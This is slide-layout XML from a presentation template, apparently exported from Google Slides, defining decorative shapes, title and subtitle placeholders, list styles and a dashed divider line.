          <a:xfrm>
            <a:off x="918032" y="4547743"/>
            <a:ext cx="317620" cy="659010"/>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5" name="Google Shape;185;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920742">
            <a:off x="5765357" y="5344289"/>
            <a:ext cx="884797" cy="750834"/>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6" name="Google Shape;186;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-3496844">
            <a:off x="174158" y="5639860"/>
            <a:ext cx="537852" cy="464440"/>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7" name="Google Shape;187;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7576503" y="5096629"/>
            <a:ext cx="846269" cy="598458"/>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8" name="Google Shape;188;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6555113" y="4151741"/>
            <a:ext cx="493819" cy="63153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89" name="Google Shape;189;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6511524" y="4836207"/>
            <a:ext cx="666366" cy="752689"/>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0" name="Google Shape;190;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1924330" y="5873179"/>
            <a:ext cx="681078" cy="4552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1" name="Google Shape;191;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728124" y="5744695"/>
            <a:ext cx="308462" cy="330481"/>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92"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3210935" y="1661762"/>
            <a:ext cx="5301600" cy="1159800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="3700" b="0"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3210885" y="2864177"/>
            <a:ext cx="5301600" cy="784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412080" y="4661638"/>
            <a:ext cx="450550" cy="558734"/>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6" name="Google Shape;196;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3968826" y="4000288"/>
            <a:ext cx="443260" cy="50467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7" name="Google Shape;197;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283364" y="4209515"/>
            <a:ext cx="210213" cy="458889"/>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8" name="Google Shape;198;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5746560" y="4042836"/>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199" name="Google Shape;199;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063610" y="4132028"/>
            <a:ext cx="456818" cy="42558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0" name="Google Shape;200;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8742973" y="4166677"/>
            <a:ext cx="495281" cy="340238"/>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1" name="Google Shape;201;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581517" y="4041241"/>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2" name="Google Shape;202;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6507132" y="4533962"/>
            <a:ext cx="521292" cy="538992"/>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3" name="Google Shape;203;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5501054" y="4557600"/>
            <a:ext cx="504670" cy="400627"/>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4" name="Google Shape;204;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5201567" y="4075599"/>
            <a:ext cx="470320" cy="44221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5" name="Google Shape;205;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765584" y="4075593"/>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6" name="Google Shape;206;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5521858" y="4998019"/>
            <a:ext cx="463059" cy="177962"/>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7" name="Google Shape;207;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8052572" y="482526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8" name="Google Shape;208;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8052577" y="4029277"/>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09" name="Google Shape;209;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6984573" y="4950383"/>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0" name="Google Shape;210;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8749725" y="4950125"/>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1" name="Google Shape;211;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6160715" y="4780234"/>
            <a:ext cx="323616" cy="321546"/>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2" name="Google Shape;212;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8522444" y="4000279"/>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3" name="Google Shape;213;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892224" y="4552927"/>
            <a:ext cx="416228" cy="409988"/>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4" name="Google Shape;214;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8829403" y="4583868"/>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5" name="Google Shape;215;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4489179" y="4206693"/>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6" name="Google Shape;216;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920548">
            <a:off x="7236726" y="4658174"/>
            <a:ext cx="501522" cy="425557"/>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7" name="Google Shape;217;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8263292" y="4517805"/>
            <a:ext cx="479681" cy="339217"/>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8" name="Google Shape;218;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="7684355" y="3982230"/>
            <a:ext cx="279906" cy="35796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19" name="Google Shape;219;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7659648" y="4370196"/>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0" name="Google Shape;220;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5059563" y="4957957"/>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1" name="Google Shape;221;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7782420" y="4885132"/>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2" name="Google Shape;222;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482765" y="4209515"/>
            <a:ext cx="210213" cy="458889"/>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3" name="Google Shape;223;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945960" y="4042836"/>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4" name="Google Shape;224;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2263010" y="4132028"/>
            <a:ext cx="456818" cy="42558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5" name="Google Shape;225;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1780917" y="4041241"/>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6" name="Google Shape;226;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706532" y="4533962"/>
            <a:ext cx="521292" cy="538992"/>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7" name="Google Shape;227;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700454" y="4557600"/>
            <a:ext cx="504670" cy="400627"/>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8" name="Google Shape;228;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400967" y="4075599"/>
            <a:ext cx="470320" cy="44221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29" name="Google Shape;229;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-35016" y="4075593"/>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0" name="Google Shape;230;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721258" y="4998019"/>
            <a:ext cx="463059" cy="177962"/>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1" name="Google Shape;231;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251972" y="482526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2" name="Google Shape;232;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251978" y="4029277"/>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3" name="Google Shape;233;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2183974" y="4950383"/>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4" name="Google Shape;234;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3949125" y="4950125"/>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5" name="Google Shape;235;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360115" y="4780234"/>
            <a:ext cx="323616" cy="321546"/>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6" name="Google Shape;236;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3721844" y="4000279"/>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7" name="Google Shape;237;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91624" y="4552927"/>
            <a:ext cx="416228" cy="409988"/>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8" name="Google Shape;238;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028803" y="4583868"/>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39" name="Google Shape;239;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2704" y="4900231"/>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0" name="Google Shape;240;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920548">
            <a:off x="2436125" y="4658174"/>
            <a:ext cx="501522" cy="425557"/>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1" name="Google Shape;241;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3462692" y="4517805"/>
            <a:ext cx="479681" cy="339217"/>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2" name="Google Shape;242;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2883755" y="3982230"/>
            <a:ext cx="279906" cy="35796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3" name="Google Shape;243;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2859048" y="4370196"/>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4" name="Google Shape;244;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258963" y="4957957"/>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45" name="Google Shape;245;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2981820" y="4885132"/>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90"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="225025"/>
            <a:ext cx="6140400" cy="8574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92" name="Google Shape;292;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="1302837"/>
            <a:ext cx="6140400" cy="3610800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-387350">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2500"/>
              <a:buChar char="✘"/>
              <a:defRPr sz="25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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7442902" y="-91154"/>
            <a:ext cx="1796289" cy="5330574"/>
            <a:chOff x="6023725" y="842300"/>
            <a:chExt cx="1358150" cy="4030375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="294" name="Google Shape;294;p5"/>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5" name="Google Shape;295;p5"/>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6" name="Google Shape;296;p5"/>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7" name="Google Shape;297;p5"/>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8" name="Google Shape;298;p5"/>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299" name="Google Shape;299;p5"/>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0" name="Google Shape;300;p5"/>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1" name="Google Shape;301;p5"/>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2" name="Google Shape;302;p5"/>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3" name="Google Shape;303;p5"/>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4" name="Google Shape;304;p5"/>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5" name="Google Shape;305;p5"/>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6" name="Google Shape;306;p5"/>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7" name="Google Shape;307;p5"/>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8" name="Google Shape;308;p5"/>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09" name="Google Shape;309;p5"/>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0" name="Google Shape;310;p5"/>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1" name="Google Shape;311;p5"/>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2" name="Google Shape;312;p5"/>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3" name="Google Shape;313;p5"/>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4" name="Google Shape;314;p5"/>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5" name="Google Shape;315;p5"/>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6" name="Google Shape;316;p5"/>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7" name="Google Shape;317;p5"/>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8" name="Google Shape;318;p5"/>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19" name="Google Shape;319;p5"/>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0" name="Google Shape;320;p5"/>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1" name="Google Shape;321;p5"/>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322" name="Google Shape;322;p5"/>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grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850475" y="1031425"/>
            <a:ext cx="6037800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="A4C2F4"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90619" y="472273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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7302880" y="-294362"/>
            <a:ext cx="450550" cy="558734"/>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78" name="Google Shape;478;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-35374" y="3366963"/>
            <a:ext cx="443260" cy="50467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79" name="Google Shape;479;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8817948" y="3439661"/>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0" name="Google Shape;480;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8742973" y="4166677"/>
            <a:ext cx="495281" cy="340238"/>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1" name="Google Shape;481;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8360955" y="4506916"/>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2" name="Google Shape;482;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-77078" y="1488018"/>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3" name="Google Shape;483;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8052572" y="482526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4" name="Google Shape;484;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8052577" y="4132327"/>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5" name="Google Shape;485;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7430898" y="4873171"/>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6" name="Google Shape;486;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8749725" y="4950125"/>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7" name="Google Shape;487;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8522444" y="4000279"/>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8" name="Google Shape;488;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8829403" y="4583868"/>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89" name="Google Shape;489;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8963979" y="1338718"/>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0" name="Google Shape;490;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2426120">
            <a:off x="7110132" y="4877011"/>
            <a:ext cx="279910" cy="357971"/>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1" name="Google Shape;491;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7659648" y="4370196"/>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2" name="Google Shape;492;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8797588" y="3078732"/>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3" name="Google Shape;493;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7782420" y="4885132"/>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4" name="Google Shape;494;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346877" y="608615"/>
